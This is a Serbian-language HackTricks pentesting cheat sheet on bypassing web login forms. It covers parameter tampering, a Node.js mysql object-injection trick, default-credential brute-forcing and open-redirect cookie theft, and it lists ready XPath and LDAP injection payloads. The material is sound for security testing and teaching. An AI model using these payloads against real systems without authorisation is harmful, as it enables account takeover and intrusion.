Login Bypass

Reading time: 4 minutes

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks

Zaobilaženje regularnog prijavljivanja

Ako pronađete stranicu za prijavu, ovde možete pronaći neke tehnike koje možete pokušati da zaobiđete:

  • Proverite komentare unutar stranice (pomaknite se prema dolje i desno?)
  • Proverite da li možete direktno pristupiti ograničenim stranicama
  • Proverite da ne šaljete parametre (ne šaljite nijedan ili samo 1)
  • Proverite PHP greške u poređenju: user[]=a&pwd=b , user=a&pwd[]=b , user[]=a&pwd[]=b
  • Promenite tip sadržaja na json i pošaljite json vrednosti (bool true uključen)
  • Ako dobijete odgovor koji kaže da POST nije podržan, možete pokušati da pošaljete JSON u telu, ali sa GET zahtevom sa Content-Type: application/json
  • Proverite potencijalnu grešku u parsiranju nodejs-a (pročitajte ovo): password[password]=1
  • Nodejs će transformisati taj payload u upit sličan sledećem: SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; što čini da deo za lozinku uvek bude tačan.
  • Ako možete poslati JSON objekat, možete poslati "password":{"password": 1} da zaobiđete prijavu.
  • Zapamtite da da biste zaobišli ovu prijavu, još uvek morate znati i poslati važeće korisničko ime.
  • Dodavanje "stringifyObjects":true opcije prilikom pozivanja mysql.createConnection će na kraju blokirati sve neočekivane ponašanja kada se Object prosledi kao parametar.
  • Proverite akreditive:
  • Podrazumevani akreditive tehnologije/platforme koja se koristi
  • Uobičajene kombinacije (root, admin, password, naziv tehnologije, podrazumevani korisnik sa jednom od ovih lozinki).
  • Kreirajte rečnik koristeći Cewl, dodajte podrazumevano korisničko ime i lozinku (ako postoji) i pokušajte da ih brute-force koristeći sve reči kao korisnička imena i lozinke
  • Brute-force koristeći veći rečnik (Brute force)

SQL Injection zaobilaženje autentifikacije

Ovde možete pronaći nekoliko trikova za zaobilaženje prijave putem SQL injekcija.

Na sledećoj stranici možete pronaći prilagođenu listu za pokušaj zaobilaženja prijave putem SQL injekcija:

Login bypass List

No SQL Injection zaobilaženje autentifikacije

Ovde možete pronaći nekoliko trikova za zaobilaženje prijave putem No SQL injekcija.

Pošto NoSQL injekcije zahtevaju promenu vrednosti parametara, moraćete da ih testirate ručno.

XPath Injection zaobilaženje autentifikacije

Ovde možete pronaći nekoliko trikova za zaobilaženje prijave putem XPath injekcije.

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP Injection autentifikacija zaobilaženje

Ovde možete pronaći nekoliko trikova za zaobilaženje prijave putem LDAP Injection.

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

Zapamti me

Ako stranica ima funkcionalnost "Zapamti me", proverite kako je implementirana i vidite da li je možete iskoristiti da preuzmete druge naloge.

Preusmeravanja

Stranice obično preusmeravaju korisnike nakon prijavljivanja, proverite da li možete izmeniti to preusmeravanje da izazovete Open Redirect. Možda možete ukrasti neke informacije (kodove, kolačiće...) ako preusmerite korisnika na vašu veb stranicu.

Ostale provere

  • Proverite da li možete enumerisati korisnička imena zloupotrebom funkcionalnosti prijavljivanja.
  • Proverite da li je automatsko popunjavanje aktivno u formama za lozinke/osetljive informacije input: <input autocomplete="false">

Automatski alati

tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks